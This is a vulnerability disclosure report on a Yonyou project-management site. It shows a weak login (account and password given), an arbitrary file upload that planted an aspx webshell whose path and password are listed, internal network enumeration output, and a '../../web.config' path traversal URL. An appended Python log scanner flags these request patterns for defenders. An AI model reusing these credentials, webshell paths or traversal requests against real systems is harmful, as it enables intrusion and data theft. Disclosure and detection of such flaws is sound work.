### Brief description:

Getshell; the internal network is at risk.

### Detailed description:

Target address: http://nczx.yonyou.com/SubModule/Login/index.aspx

![QQ截图20151016161934.jpg](https://images.seebug.org/upload/201510/161618194cfeb75abeabcb49a4cfbcfe808002da.jpg)

1# Weak account password

Account: liuni
Password: 123456

After logging in, the system turns out to be fairly full-featured.

![QQ截图20151016215821.jpg](https://images.seebug.org/upload/201510/1621571765aa2ef0ef0db88379a3b441efdaeadf.jpg)

![QQ截图20151016215851.jpg](https://images.seebug.org/upload/201510/16215738733ed8610e3207d8f0f904c6c972bfb4.jpg)

An upload point was found in the project green channel feature.

2# Arbitrary file upload

![QQ截图20151016215944.jpg](https://images.seebug.org/upload/201510/16220726bb8fe6404277c5459cf6f9073635b35d.jpg)

```
http://nczx.yonyou.com/SubModule/ProjectManage/RemoteTask.aspx?tasktype=2
```

An aspx webshell can be uploaded directly.

![QQ截图20151016221038.jpg](https://images.seebug.org/upload/201510/16220927148afc6520466900fa424e55384bdf33.jpg)

Testing showed that the uploaded file ends up at

```
http://nczx.yonyou.com/SubModule/ProjectManage/RemoteTaskAttachs/tmp/62360545liuni/x.aspx
```

Password: F4ck

![QQ截图20151016221219.jpg](https://images.seebug.org/upload/201510/162211297e219814ec49ba5f635a163537b19e57.jpg)

![QQ截图20151016221821.jpg](https://images.seebug.org/upload/201510/162217077cae20a7e019f3c69da0e4fabf810e18.jpg)

```
接口: 172.16.3.111 --- 0xa
  Internet 地址         物理地址              类型
  172.16.3.1            c4-ca-d9-36-76-e7     动态
  172.16.3.27           00-e0-81-de-0d-90     动态
  172.16.3.32           00-1a-4d-20-db-60     动态
  172.16.3.54           00-e0-81-b9-4e-00     动态
  172.16.3.92           00-1a-4b-de-3d-64     动态
  172.16.3.100          00-1b-78-76-d7-96     动态
  172.16.3.102          00-1a-4b-de-d5-d4     动态
  172.16.3.103          00-11-25-8d-1f-58     动态
  172.16.3.104          00-19-21-64-30-ec     动态
  172.16.3.151          00-e0-81-d7-6d-6a     动态
  172.16.3.155          00-e0-81-d1-ad-89     动态
  172.16.3.189          00-e0-81-d0-0d-d9     动态
  172.16.3.204          00-15-17-d4-07-fd     动态
  172.16.3.255          ff-ff-ff-ff-ff-ff     静态
  224.0.0.22            01-00-5e-00-00-16     静态
  224.0.0.251           01-00-5e-00-00-fb     静态
  224.0.0.252           01-00-5e-00-00-fc     静态
  224.0.1.24            01-00-5e-00-01-18     静态
  229.111.112.12        01-00-5e-6f-70-0c     静态
  232.44.44.233         01-00-5e-2c-2c-e9     静态
  239.5.5.5             01-00-5e-05-05-05     静态
  239.255.255.250       01-00-5e-7f-ff-fa     静态
  255.255.255.255       ff-ff-ff-ff-ff-ff     静态
```

The internal network is reachable.

![QQ截图20151016221922.jpg](https://images.seebug.org/upload/201510/1622182596f9f30d0123fdd700242b98153dd562.jpg)

### Proof of vulnerability:

```
服务器名称            注解
-------------------------------------------------------------------------------
\\CYLSERVER
\\NC-RM
\\NCSCMSERVER1
\\R520156
\\U8DBSERVER0
\\U8DRP2008
\\U8JC40
\\U8MANAGESERVER
\\U8PATCHSRV
\\U8PATCHSRV2
\\UF200703040
\\UF201103043          uf201103043
\\UF201103061
命令成功完成。
```

![QQ截图20151016222004.jpg](https://images.seebug.org/upload/201510/162219076a4159fc0e0040f834dd8e7e39dc71d9.jpg)

3# Arbitrary file download (login required)

```
http://nczx.yonyou.com/SubModule/ProjectManage/Document/Download.aspx?destFileName=../../web.config
```

![QQ截图20151016222257.jpg](https://images.seebug.org/upload/201510/162222140ff51253314b8a9d5ef620a49849a017.jpg)

![QQ截图20151016222314.jpg](https://images.seebug.org/upload/201510/1622220240149646a74c3ee7014929caf1c00723.jpg)
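
For defenders, the two request patterns in this report (a `destFileName` value that climbs out of the download directory, and a script file requested from under `RemoteTaskAttachs/`) can be flagged in web server logs. The following is an added example, not part of the original report: the log layout, sample lines, user names, client addresses and rule names are constructed assumptions; only the two URL paths and the parameter name come from the report.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed IIS-style log lines: date time method uri-stem uri-query user c-ip status
SAMPLE_LOG = """\
2015-10-16 14:01:02 GET /SubModule/ProjectManage/Document/Download.aspx destFileName=report.docx userA 203.0.113.5 200
2015-10-16 14:03:10 GET /SubModule/ProjectManage/Document/Download.aspx destFileName=../../web.config userB 203.0.113.9 200
2015-10-16 14:03:40 GET /SubModule/ProjectManage/Document/Download.aspx destFileName=%252e%252e%255cweb.config userB 203.0.113.9 200
2015-10-16 14:05:00 POST /SubModule/ProjectManage/RemoteTaskAttachs/tmp/0001userB/x.aspx - - 203.0.113.9 200
2015-10-16 14:06:00 GET /SubModule/ProjectManage/RemoteTaskAttachs/tmp/0002userA/plan.pdf - userA 203.0.113.5 200
"""

DOWNLOAD_PAGE = "/submodule/projectmanage/document/download.aspx"
UPLOAD_DIR = "/submodule/projectmanage/remotetaskattachs/"
# Extensions that IIS/ASP.NET would execute or that expose configuration (assumed list).
SCRIPT_EXT = re.compile(r"\.(aspx?|ashx|asmx|cshtml|config)$")

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is compared in clear form."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(name):
    """True if a requested file name would escape the download directory."""
    name = fully_decode(name).replace("\\", "/")
    return ".." in name.split("/") or name.startswith("/") or bool(re.match(r"[A-Za-z]:", name))

def classify(line):
    """Return (rule, client_ip, detail) for a suspicious request, else None."""
    fields = line.split()
    if len(fields) != 8:
        return None
    _date, _time, _method, stem, query, _user, ip, _status = fields
    stem = fully_decode(stem).lower()
    if stem == DOWNLOAD_PAGE:
        # ASP.NET treats query keys case-insensitively, so normalise them.
        params = {k.lower(): v for k, v in parse_qs(query).items()}
        for value in params.get("destfilename", []):
            if is_traversal(value):
                return ("path-traversal", ip, fully_decode(value))
    if stem.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(stem):
        return ("script-in-upload-dir", ip, stem)
    return None

def scan(log_text):
    return [hit for hit in map(classify, log_text.splitlines()) if hit]
```

The same two conditions are what the server-side fix has to enforce: resolve the requested name and confirm it stays inside the document directory before serving it, and never let the upload directory execute script extensions.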